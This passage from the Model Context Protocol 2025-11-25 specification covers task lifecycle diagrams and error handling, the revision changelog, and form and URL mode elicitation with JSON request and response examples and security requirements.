S->>C: working
deactivate S
Note over S: Server needs information from client. Task moves to input_required
Note over C,S: Client polls and discovers input_required
C->>S: tasks/get (task-123)
activate S
S->>C: input_required
deactivate S
Note over C,S: Client opens result stream
C->>S: tasks/result (task-123)
activate S
S->>C: elicitation/create (related-task: task-123)
activate C
C->>U: Prompt user for input
U->>C: Provide information
C->>S: elicitation response (related-task: task-123)
deactivate C
deactivate S
Note over C,S: Client closes result stream and resumes polling
Note over S: Task continues processing... Task moves back to working
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over S: Task completes
Note over C,S: Client polls and discovers completion
C->>S: tasks/get (task-123)
activate S
S->>C: completed
deactivate S
Note over C,S: Client retrieves final results
C->>S: tasks/result (task-123)
activate S
S->>C: Result content
deactivate S
C->>LLM: Process result
Note over S: Results retained for ttl period from creation
```
### Task-Augmented Sampling Request
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Receiver)
participant S as Server (Requestor)
Note over S: Server decides to initiate request
Note over S,C: Server requests client operation (task-augmented)
S->>C: sampling/createMessage (ttl: 3600000)
activate C
C->>S: CreateTaskResult (request-789, status: working)
deactivate C
Note over S: Server continues processing while waiting for result
Note over S,C: Server polls for result
S->>C: tasks/get (request-789)
activate C
C->>S: working
deactivate C
Note over C,U: Client may present request to user
C->>U: Review request
U->>C: Approve request
Note over C,LLM: Client may involve LLM
C->>LLM: Request completion
LLM->>C: Return completion
Note over C,U: Client may present result to user
C->>U: Review result
U->>C: Approve result
Note over S,C: Server polls and discovers completion
S->>C: tasks/get (request-789)
activate C
C->>S: completed
deactivate C
Note over S,C: Server retrieves result
S->>C: tasks/result (request-789)
activate C
C->>S: Result content
deactivate C
Note over S: Server continues processing
Note over C: Results retained for ttl period from creation
```
### Task Cancellation Flow
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: tools/call (request ID: 42, ttl: 60000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over C,S: 2. Task Processing
C->>S: tasks/get (task-123)
activate S
S->>C: working
deactivate S
Note over C,S: 3. Client Cancellation
Note over C: User requests cancellation
C->>S: tasks/cancel (taskId: task-123)
activate S
Note over S: Server stops execution (best effort)
Note over S: Task moves to cancelled status
S->>C: Task (status: cancelled)
deactivate S
Note over C: Client receives confirmation
Note over S: Server may delete task at its discretion
```
## Data Types
### Task
A task represents the execution state of a request. The task state includes:
* `taskId`: Unique identifier for the task
* `status`: Current state of the task execution
* `statusMessage`: Optional human-readable message describing the current state (can be present for any status, including error details for failed tasks)
* `createdAt`: ISO 8601 timestamp when the task was created
* `ttl`: Time in milliseconds from creation before task may be deleted
* `pollInterval`: Suggested time in milliseconds between status checks
* `lastUpdatedAt`: ISO 8601 timestamp when the task status was last updated
### Task Status
Tasks can be in one of the following states:
* `working`: The request is currently being processed.
* `input_required`: The receiver needs input from the requestor. The requestor should call `tasks/result` to receive input requests, even though the task has not reached a terminal state.
* `completed`: The request completed successfully and results are available.
* `failed`: The associated request did not complete successfully. For tool calls specifically, this includes cases where the tool call result has `isError` set to true.
* `cancelled`: The request was cancelled before completion.
### Task Parameters
When augmenting a request with task execution, the `task` field is included in the request parameters:
```json theme={null}
{
"task": {
"ttl": 60000
}
}
```
Fields:
* `ttl` (number, optional): Requested duration in milliseconds to retain the task, measured from creation
### Related Task Metadata
All requests, responses, and notifications associated with a task **MUST** include the `io.modelcontextprotocol/related-task` key in `_meta`:
```json theme={null}
{
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
This associates messages with their originating task across the entire request lifecycle.
For the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, requestors and receivers **SHOULD NOT** include this metadata in their messages, as the `taskId` is already present in the message structure.
The `tasks/result` operation **MUST** include this metadata in its response, as the result structure itself does not contain the task ID.
## Error Handling
Tasks use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for protocol-level issues
2. **Task Execution Errors**: Errors in the underlying request execution, reported through task status
### Protocol Errors
Receivers **MUST** return standard JSON-RPC errors for the following protocol error cases:
* Invalid or nonexistent `taskId` in `tasks/get`, `tasks/result`, or `tasks/cancel`: `-32602` (Invalid params)
* Invalid or nonexistent cursor in `tasks/list`: `-32602` (Invalid params)
* Attempt to cancel a task already in a terminal status: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
Additionally, receivers **MAY** return the following errors:
* Non-task-augmented request when receiver requires task augmentation for that request type: `-32600` (Invalid request)
Receivers **SHOULD** provide informative error messages to describe the cause of errors.
**Example: Task augmentation required**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32600,
"message": "Task augmentation required for tools/call requests"
}
}
```
**Example: Task not found**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 70,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task not found"
}
}
```
**Example: Task expired**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 71,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task has expired"
}
}
```
Receivers are not required to retain tasks indefinitely. It is compliant behavior for a receiver to return an error stating the task cannot be found if it has purged an expired task.
**Example: Task cancellation rejected (already terminal)**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 74,
"error": {
"code": -32602,
"message": "Cannot cancel task: already in terminal status 'completed'"
}
}
```
### Task Execution Errors
When the underlying request does not complete successfully, the task moves to the `failed` status. This includes JSON-RPC protocol errors during request execution, or for tool calls specifically, when the tool result has `isError` set to true. The `tasks/get` response **SHOULD** include a `statusMessage` field with diagnostic information about the failure.
**Example: Task with execution error**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f820fe840",
"status": "failed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"statusMessage": "Tool execution failed: API rate limit exceeded"
}
}
```
For tasks that wrap tool call requests, when the tool result has `isError` set to `true`, the task should reach `failed` status.
The `tasks/result` endpoint returns exactly what the underlying request would have returned:
* If the underlying request resulted in a JSON-RPC error, `tasks/result` **MUST** return that same JSON-RPC error.
* If the request completed with a JSON-RPC response, `tasks/result` **MUST** return a successful JSON-RPC response containing that result.
## Security Considerations
### Task Isolation and Access Control
Task IDs are the primary mechanism for accessing task state and results. Without proper access controls, any party that can guess or obtain a task ID could potentially access sensitive information or manipulate tasks they did not create.
When an authorization context is provided, receivers **MUST** bind tasks to said context.
Context-binding is not practical for all applications. Some MCP servers operate in environments without authorization, such as single-user tools, or use transports that don't support authorization.
In these scenarios, receivers **SHOULD** document this limitation clearly, as task results may be accessible to any requestor that can guess the task ID.
If context-binding is unavailable, receivers **MUST** generate cryptographically secure task IDs with enough entropy to prevent guessing and should consider using shorter TTL durations to reduce the exposure window.
If context-binding is available, receivers **MUST** reject `tasks/get`, `tasks/result`, and `tasks/cancel` requests for tasks that do not belong to the same authorization context as the requestor. For `tasks/list` requests, receivers **MUST** ensure the returned task list includes only tasks associated with the requestor's authorization context.
Additionally, receivers **SHOULD** implement rate limiting on task operations to prevent denial-of-service and enumeration attacks.
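A brief sketch of these requirements: unguessable task IDs via Python's `secrets` module, and an access check against a bound authorization context. The `authContext` field on the stored task is internal bookkeeping assumed for the example, not part of the protocol.

```python theme={null}
import secrets

def new_task_id() -> str:
    # 256 bits of entropy; unguessable even without context binding.
    return secrets.token_urlsafe(32)

def check_task_access(task: dict, auth_context: str | None) -> None:
    """Rejects access when a bound context exists and does not match."""
    if auth_context is not None and task.get("authContext") != auth_context:
        # Report the same error as a missing task to avoid leaking existence.
        raise KeyError("Task not found")
```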
### Resource Management
1. Receivers **SHOULD**:
1. Enforce limits on concurrent tasks per requestor
2. Enforce maximum `ttl` durations to prevent indefinite resource retention
3. Clean up expired tasks promptly to free resources
4. Document maximum supported `ttl` duration
5. Document maximum concurrent tasks per requestor
6. Implement monitoring and alerting for resource usage
### Audit and Logging
1. Receivers **SHOULD**:
1. Log task creation, completion, and retrieval events for audit purposes
2. Include auth context in logs when available
3. Monitor for suspicious patterns (e.g., many failed task lookups, excessive polling)
2. Requestors **SHOULD**:
1. Log task lifecycle events for debugging and audit purposes
2. Track task IDs and their associated operations
# Key Changes
Source: https://modelcontextprotocol.io/specification/2025-11-25/changelog
This document lists changes made to the Model Context Protocol (MCP) specification since
the previous revision, [2025-06-18](/specification/2025-06-18).
## Major changes
1. Enhance authorization server discovery with support for [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html). (PR [#797](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/797))
2. Allow servers to expose icons as additional metadata for tools, resources, resource templates, and prompts ([SEP-973](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/973)).
3. Enhance authorization flows with incremental scope consent via `WWW-Authenticate` ([SEP-835](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/835))
4. Provide guidance on tool names ([SEP-986](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1603))
5. Update `ElicitResult` and `EnumSchema` to use a more standards-based approach and support titled, untitled, single-select, and multi-select enums ([SEP-1330](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1330)).
6. Added support for [URL mode elicitation](/specification/2025-11-25/client/elicitation#url-elicitation-requests) ([SEP-1036](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/887))
7. Add tool calling support to sampling via `tools` and `toolChoice` parameters ([SEP-1577](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1577))
8. Add support for OAuth Client ID Metadata Documents as a recommended client registration mechanism ([SEP-991](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/991), PR [#1296](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1296))
9. Add experimental support for [tasks](/specification/2025-11-25/basic/utilities/tasks) to enable tracking durable requests with polling and deferred result retrieval ([SEP-1686](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686)).
## Minor changes
1. Clarify that servers using stdio transport may use stderr for all types of logging, not just error messages (PR [#670](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/670)).
2. Add optional `description` field to `Implementation` interface to align with MCP registry server.json format and provide human-readable context during initialization.
3. Clarify that servers must respond with HTTP 403 Forbidden for invalid Origin headers in Streamable HTTP transport. (PR [#1439](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1439))
4. Updated the [Security Best Practices guidance](https://modelcontextprotocol.io/specification/draft/basic/security_best_practices).
5. Clarify that input validation errors should be returned as Tool Execution Errors rather than Protocol Errors to enable model self-correction ([SEP-1303](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1303)).
6. Support polling SSE streams by allowing servers to disconnect at will ([SEP-1699](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1699)).
7. Clarify SEP-1699: GET streams support polling, resumption always via GET regardless of stream origin, event IDs should encode stream identity, disconnection includes server-initiated closure (Issue [#1847](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1847)).
8. Align OAuth 2.0 Protected Resource Metadata discovery with RFC 9728, making `WWW-Authenticate` header optional with fallback to `.well-known` endpoint ([SEP-985](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/985)).
9. Add support for default values in all primitive types (string, number, enum) for elicitation schemas ([SEP-1034](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1034)).
10. Establish JSON Schema 2020-12 as the default dialect for MCP schema definitions ([SEP-1613](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1613)).
## Other schema changes
1. Decouple request payloads from RPC method definitions into standalone parameter schemas. ([SEP-1319](https://github.com/modelcontextprotocol/specification/issues/1319), PR [#1284](https://github.com/modelcontextprotocol/specification/pull/1284))
## Governance and process updates
1. Formalize Model Context Protocol governance structure ([SEP-932](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/932)).
2. Establish shared communication practices and guidelines for the MCP community ([SEP-994](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/994)).
3. Formalize Working Groups and Interest Groups in MCP governance ([SEP-1302](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1302)).
4. Establish SDK tiering system with clear requirements for feature support and maintenance commitments ([SEP-1730](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1730)).
## Full changelog
For a complete list of all changes that have been made since the last protocol revision,
[see GitHub](https://github.com/modelcontextprotocol/specification/compare/2025-06-18...2025-11-25).
# Elicitation
Source: https://modelcontextprotocol.io/specification/2025-11-25/client/elicitation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) provides a standardized way for servers to request additional
information from users through the client during interactions. This flow allows clients to
maintain control over user interactions and data sharing while enabling servers to gather
necessary information dynamically.
Elicitation supports two modes:
* **Form mode**: Servers can request structured data from users with optional JSON schemas to validate responses
* **URL mode**: Servers can direct users to external URLs for sensitive interactions that must *not* pass through the MCP client
## User Interaction Model
Elicitation in MCP allows servers to implement interactive workflows by enabling user input
requests to occur *nested* inside other MCP server features.
Implementations are free to expose elicitation through any interface pattern that suits
their needs—the protocol itself does not mandate any specific user interaction
model.
For trust & safety and security:
* Servers **MUST NOT** use form mode elicitation to request sensitive information
* Servers **MUST** use URL mode for interactions involving sensitive information, such as credentials
MCP clients **MUST**:
* Provide UI that makes it clear which server is requesting information
* Respect user privacy and provide clear decline and cancel options
* For form mode, allow users to review and modify their responses before sending
* For URL mode, clearly display the target domain/host and gather user consent before navigation to the target URL
## Capabilities
Clients that support elicitation **MUST** declare the `elicitation` capability during
[initialization](../basic/lifecycle#initialization):
```json theme={null}
{
"capabilities": {
"elicitation": {
"form": {},
"url": {}
}
}
}
```
For backwards compatibility, an empty capabilities object is equivalent to declaring support for `form` mode only:
```jsonc theme={null}
{
"capabilities": {
"elicitation": {}, // Equivalent to { "form": {} }
},
}
```
Clients declaring the `elicitation` capability **MUST** support at least one mode (`form` or `url`).
Servers **MUST NOT** send elicitation requests with modes that are not supported by the client.
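A small sketch of how a server might derive the usable modes from the client's declared capabilities, including the backwards-compatibility rule above:

```python theme={null}
def supported_elicitation_modes(client_capabilities: dict) -> set[str]:
    """Modes the server may use for this client."""
    elicitation = client_capabilities.get("elicitation")
    if elicitation is None:
        return set()      # client did not declare elicitation at all
    if not elicitation:
        return {"form"}   # backwards compatibility: {} is equivalent to {"form": {}}
    return {mode for mode in ("form", "url") if mode in elicitation}
```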
## Protocol Messages
### Elicitation Requests
To request information from a user, servers send an `elicitation/create` request.
All elicitation requests **MUST** include the following parameters:
| Name | Type | Options | Description |
| --------- | ------ | ------------- | -------------------------------------------------------------------------------------- |
| `mode` | string | `form`, `url` | The mode of the elicitation. Optional for form mode (defaults to `"form"` if omitted). |
| `message` | string | | A human-readable message explaining why the interaction is needed. |
The `mode` parameter specifies the type of elicitation:
* `"form"`: In-band structured data collection with optional schema validation. Data is exposed to the client.
* `"url"`: Out-of-band interaction via URL navigation. Data (other than the URL itself) is **not** exposed to the client.
For backwards compatibility, servers **MAY** omit the `mode` field for form mode elicitation requests. Clients **MUST** treat requests without a `mode` field as form mode.
### Form Mode Elicitation Requests
Form mode elicitation allows servers to collect structured data directly through the MCP client.
Form mode elicitation requests **MUST** either specify `mode: "form"` or omit the `mode` field, and include these additional parameters:
| Name | Type | Description |
| ----------------- | ------ | -------------------------------------------------------------- |
| `requestedSchema` | object | A JSON Schema defining the structure of the expected response. |
#### Requested Schema
The `requestedSchema` parameter allows servers to define the structure of the expected
response using a restricted subset of JSON Schema.
To simplify client user experience, form mode elicitation schemas are limited to flat objects
with primitive properties only.
The schema is restricted to these primitive types:
1. **String Schema**
```json theme={null}
{
"type": "string",
"title": "Display Name",
"description": "Description text",
"minLength": 3,
"maxLength": 50,
"pattern": "^[A-Za-z]+$",
"format": "email",
"default": "user@example.com"
}
```
Supported formats: `email`, `uri`, `date`, `date-time`
2. **Number Schema**
```json theme={null}
{
"type": "number", // or "integer"
"title": "Display Name",
"description": "Description text",
"minimum": 0,
"maximum": 100,
"default": 50
}
```
3. **Boolean Schema**
```json theme={null}
{
"type": "boolean",
"title": "Display Name",
"description": "Description text",
"default": false
}
```
4. **Enum Schema**
Single-select enum (without titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"enum": ["Red", "Green", "Blue"],
"default": "Red"
}
```
Single-select enum (with titles):
```json theme={null}
{
"type": "string",
"title": "Color Selection",
"description": "Choose your favorite color",
"oneOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
],
"default": "#FF0000"
}
```
Multi-select enum (without titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"type": "string",
"enum": ["Red", "Green", "Blue"]
},
"default": ["Red", "Green"]
}
```
Multi-select enum (with titles):
```json theme={null}
{
"type": "array",
"title": "Color Selection",
"description": "Choose your favorite colors",
"minItems": 1,
"maxItems": 2,
"items": {
"anyOf": [
{ "const": "#FF0000", "title": "Red" },
{ "const": "#00FF00", "title": "Green" },
{ "const": "#0000FF", "title": "Blue" }
]
},
"default": ["#FF0000", "#00FF00"]
}
```
Clients can use this schema to:
1. Generate appropriate input forms
2. Validate user input before sending
3. Provide better guidance to users
All primitive types support optional default values to provide sensible starting points. Clients that support defaults **SHOULD** pre-populate form fields with these values.
Note that complex nested structures, arrays of objects (beyond enums), and other advanced JSON Schema features are intentionally not supported to simplify client user experience.
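As a tiny illustration of the defaults rule above, a client could seed its form state like this:

```python theme={null}
def initial_form_values(requested_schema: dict) -> dict:
    """Pre-populates form fields from per-property defaults, where present."""
    return {
        name: prop["default"]
        for name, prop in requested_schema.get("properties", {}).items()
        if "default" in prop
    }
```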
#### Example: Simple Text Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your GitHub username",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
},
"required": ["name"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept",
"content": {
"name": "octocat"
}
}
}
```
#### Example: Structured Data Request
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "elicitation/create",
"params": {
"mode": "form",
"message": "Please provide your contact information",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Your full name"
},
"email": {
"type": "string",
"format": "email",
"description": "Your email address"
},
"age": {
"type": "number",
"minimum": 18,
"description": "Your age"
}
},
"required": ["name", "email"]
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"action": "accept",
"content": {
"name": "Monalisa Octocat",
"email": "octocat@github.com",
"age": 30
}
}
}
```
### URL Mode Elicitation Requests
**New feature:** URL mode elicitation is introduced in the `2025-11-25` version of the MCP specification. Its design and implementation may change in future protocol revisions.
URL mode elicitation enables servers to direct users to external URLs for out-of-band interactions that must not pass through the MCP client. This is essential for auth flows, payment processing, and other sensitive or secure operations.
URL mode elicitation requests **MUST** specify `mode: "url"` and a `message`, and include these additional parameters:
| Name | Type | Description |
| --------------- | ------ | ----------------------------------------- |
| `url` | string | The URL that the user should navigate to. |
| `elicitationId` | string | A unique identifier for the elicitation. |
The `url` parameter **MUST** contain a valid URL.
**Important**: URL mode elicitation is *not* for authorizing the MCP client's
access to the MCP server (that's handled by [MCP
authorization](../basic/authorization)). Instead, it's used when the MCP
server needs to obtain sensitive information or third-party authorization on
behalf of the user. The MCP client's bearer token remains unchanged. The
client's only responsibility is to provide the user with context about the
elicitation URL the server wants them to open.
#### Example: Request Sensitive Data
This example shows a URL mode elicitation request directing the user to a secure URL where they can provide sensitive information (an API key, for example).
The same request could direct the user into an OAuth authorization flow, or a payment flow. The only difference is the URL and the message.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "elicitation/create",
"params": {
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/ui/set_api_key",
"message": "Please provide your API key to continue."
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"action": "accept"
}
}
```
The response with `action: "accept"` indicates that the user has consented to the
interaction. It does not mean that the interaction is complete. The interaction occurs out
of band and the client is not aware of the outcome until and unless the server sends a notification indicating completion.
### Completion Notifications for URL Mode Elicitation
Servers **MAY** send a `notifications/elicitation/complete` notification when an
out-of-band interaction started by URL mode elicitation is completed. This allows clients to react programmatically if appropriate.
Servers sending notifications:
* **MUST** only send the notification to the client that initiated the elicitation request.
* **MUST** include the `elicitationId` established in the original `elicitation/create` request.
Clients:
* **MUST** ignore notifications referencing unknown or already-completed IDs.
* **MAY** wait for this notification to automatically retry requests that received a [URLElicitationRequiredError](#error-handling), update the user interface, or otherwise continue an interaction.
* **SHOULD** still provide manual controls that let the user retry or cancel the original request (or otherwise resume interacting with the client) if the notification never arrives.
#### Example
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/elicitation/complete",
"params": {
"elicitationId": "550e8400-e29b-41d4-a716-446655440000"
}
}
```
### URL Elicitation Required Error
When a request cannot be processed until an elicitation is completed, the server **MAY** return a [`URLElicitationRequiredError`](#error-handling) (code `-32042`) to indicate to the client that a URL mode elicitation is required. The server **MUST NOT** return this error except when URL mode elicitation is required.
The error **MUST** include a list of elicitations that are required to complete before the original can be retried.
Any elicitations returned in the error **MUST** be URL mode elicitations and have an `elicitationId` property.
**Error Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32042, // URL_ELICITATION_REQUIRED
"message": "This request requires more information.",
"data": {
"elicitations": [
{
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://mcp.example.com/connect?elicitationId=550e8400-e29b-41d4-a716-446655440000",
"message": "Authorization is required to access your Example Co files."
}
]
}
}
}
```
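A hedged client-side sketch of this flow: catch the `-32042` error, obtain consent and open each URL, wait for the (optional) completion notification, then retry. `JsonRpcError`, `open_url_with_user_consent`, and `send_request` are hypothetical placeholders, not SDK APIs.

```python theme={null}
import asyncio

URL_ELICITATION_REQUIRED = -32042
pending: dict[str, asyncio.Event] = {}  # elicitationId -> completion signal

class JsonRpcError(Exception):  # hypothetical error type carrying code/data
    def __init__(self, code: int, message: str, data: dict | None = None):
        super().__init__(message)
        self.code, self.data = code, data or {}

# Hypothetical helpers: transport call and consent-gated navigation.
async def send_request(method: str, params: dict) -> dict: ...
def open_url_with_user_consent(url: str, message: str) -> None: ...

def on_elicitation_complete(params: dict) -> None:
    """Handler for notifications/elicitation/complete; unknown IDs are ignored."""
    event = pending.get(params.get("elicitationId", ""))
    if event:
        event.set()

async def call_with_url_elicitation(method: str, params: dict) -> dict:
    try:
        return await send_request(method, params)
    except JsonRpcError as err:
        if err.code != URL_ELICITATION_REQUIRED:
            raise
        for elicitation in err.data["elicitations"]:
            event = pending.setdefault(elicitation["elicitationId"], asyncio.Event())
            # Display the target host and gather consent before navigation.
            open_url_with_user_consent(elicitation["url"], elicitation["message"])
            await event.wait()  # the notification is optional; offer manual retry too
            pending.pop(elicitation["elicitationId"], None)
        return await send_request(method, params)  # retry the original request
```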
## Message Flow
### Form Mode Flow
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: form)
Note over User,Client: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client->>Server: Return user response
Note over Server: Continue processing with new information
```
### URL Mode Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Note over Server: Server initiates elicitation
Server->>Client: elicitation/create (mode: url)
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Client->>Server: Accept response
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Note over Server: Continue processing with new information
```
### URL Mode With Elicitation Required Error Flow
```mermaid theme={null}
sequenceDiagram
participant UserAgent as User Agent (Browser)
participant User
participant Client
participant Server
Client->>Server: tools/call
Note over Server: Server needs authorization
Server->>Client: URLElicitationRequiredError
Note over Client: Client notes the original request can be retried after elicitation
Client->>User: Present consent to open URL
User-->>Client: Provide consent
Client->>UserAgent: Open URL
Note over User,UserAgent: User interaction
UserAgent-->>Server: Interaction complete
Server-->>Client: notifications/elicitation/complete (optional)
Client->>Server: Retry tools/call (optional)
```
## Response Actions
Elicitation responses use a three-action model to clearly distinguish between different user actions. These actions apply to both form and URL elicitation modes.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"action": "accept", // or "decline" or "cancel"
"content": {
"propertyName": "value",
"anotherProperty": 42
}
}
}
```
The three response actions are:
1. **Accept** (`action: "accept"`): User explicitly approved and submitted with data
* For form mode: The `content` field contains the submitted data matching the requested schema
* For URL mode: The `content` field is omitted
* Example: User clicked "Submit", "OK", "Confirm", etc.
2. **Decline** (`action: "decline"`): User explicitly declined the request
* The `content` field is typically omitted
* Example: User clicked "Reject", "Decline", "No", etc.
3. **Cancel** (`action: "cancel"`): User dismissed without making an explicit choice
* The `content` field is typically omitted
* Example: User closed the dialog, clicked outside, pressed Escape, browser failed to load, etc.
Servers should handle each state appropriately:
* **Accept**: Process the submitted data
* **Decline**: Handle explicit decline (e.g., offer alternatives)
* **Cancel**: Handle dismissal (e.g., prompt again later)
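A server-side dispatch over the three actions might look like this sketch (`process`, `offer_alternative`, and `defer_and_retry_later` are hypothetical application handlers):

```python theme={null}
# Hypothetical application handlers.
def process(content: dict) -> None: ...
def offer_alternative() -> None: ...
def defer_and_retry_later() -> None: ...

def handle_elicitation_result(result: dict) -> None:
    match result["action"]:
        case "accept":
            process(result.get("content", {}))  # form mode: submitted data; URL mode: omitted
        case "decline":
            offer_alternative()  # user explicitly refused
        case "cancel":
            defer_and_retry_later()  # dismissed without an explicit choice
```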
## Implementation Considerations
### Statefulness
Most practical uses of elicitation require that the server maintain state about users:
* Whether required information has been collected (e.g., the user's display name via form mode elicitation)
* Status of resource access (e.g., API keys or a payment flow via URL mode elicitation)
Servers implementing elicitation **MUST** securely associate this state with individual users following the guidelines in the [security best practices](../basic/security_best_practices) document. Specifically:
* State **MUST NOT** be associated with session IDs alone
* State storage **MUST** be protected against unauthorized access
* For remote MCP servers, user identification **MUST** be derived from credentials acquired via [MCP authorization](../basic/authorization) when possible (e.g. `sub` claim)
The examples in this section are non-normative and illustrate potential uses
of elicitation. Implementers should adapt these patterns to their specific
requirements while maintaining security best practices.
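As one non-normative illustration, a server might key its per-user elicitation state on the authoritative subject from MCP authorization rather than on a session ID (the state fields here are purely illustrative):
```typescript theme={null}
// Non-normative sketch: state keyed by the authoritative user identity
// (e.g. the `sub` claim from a validated access token), never by session ID.
interface UserElicitationState {
  displayName?: string;          // collected via form mode elicitation
  externalApiConnected: boolean; // completed via URL mode elicitation
}

const stateByUser = new Map<string, UserElicitationState>();

// `sub` must come from the validated token, not from client-supplied input.
function getStateForUser(sub: string): UserElicitationState {
  let state = stateByUser.get(sub);
  if (state === undefined) {
    state = { externalApiConnected: false };
    stateByUser.set(sub, state);
  }
  return state;
}
```
A real deployment would back this with storage protected against unauthorized access, per the requirements above; the in-memory map is only a sketch.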
### URL Mode Elicitation for Sensitive Data
For servers that interact with external APIs requiring sensitive information (e.g., credentials, payment information), URL mode elicitation provides a secure mechanism for users to provide this information without exposing it to the MCP client.
In this pattern:
1. The server directs users to a secure web page (served over HTTPS)
2. The page presents a branded form UI on a domain the user trusts
3. Users enter sensitive credentials directly into the secure form
4. The server stores credentials securely, bound to the user's identity
5. Subsequent MCP requests use these stored credentials for API access
This approach ensures that sensitive credentials never pass through the LLM context, MCP client or any intermediate MCP servers, reducing the risk of exposure through client-side logging or other attack vectors.
### URL Mode Elicitation for OAuth Flows
URL mode elicitation enables a pattern where MCP servers act as OAuth clients to third-party resource servers.
Authorization with external APIs enabled by URL mode elicitation is separate from [MCP authorization](../basic/authorization). MCP servers **MUST NOT** rely on URL mode elicitation to authorize users for themselves.
#### Understanding the Distinction
* **MCP Authorization**: Required OAuth flow between the MCP client and MCP server (covered in the [authorization specification](../basic/authorization))
* **External (third-party) Authorization**: Optional authorization between the MCP server and a third-party resource server, initiated via URL mode elicitation
In external authorization, the server acts as both:
* An OAuth resource server (to the MCP client)
* An OAuth client (to the third-party resource server)
Example scenario:
* An MCP client connects to an MCP server
* The MCP server integrates with various different third-party services
* When the MCP client calls a tool that requires access to a third-party service, the MCP server needs credentials for that service
The critical security requirements are:
1. **The third-party credentials MUST NOT transit through the MCP client**: The client must never see third-party credentials to protect the security boundary
2. **The MCP server MUST NOT use the client's credentials for the third-party service**: That would be [token passthrough](../basic/security_best_practices#token-passthrough), which is forbidden
3. **The user MUST authorize the MCP server directly**: The interaction happens outside the MCP protocol, without involving the MCP client
4. **The MCP server is responsible for tokens**: The MCP server stores and manages the third-party tokens obtained through URL mode elicitation (in other words, the MCP server must be stateful).
Credentials obtained via URL mode elicitation are distinct from the MCP server credentials used by the MCP client. The MCP server **MUST NOT** transmit credentials obtained through URL mode elicitation to the MCP client.
For additional background, refer to the [token passthrough
section](../basic/security_best_practices#token-passthrough) of the Security
Best Practices document to understand why MCP servers cannot act as
pass-through proxies.
#### Implementation Pattern
When implementing external authorization via URL mode elicitation:
1. The MCP server generates an authorization URL, acting as an OAuth client to the third-party service
2. The MCP server stores internal state that associates (binds) the elicitation request with the user's identity.
3. The MCP server sends a URL mode elicitation request to the client with a URL that can start the authorization flow.
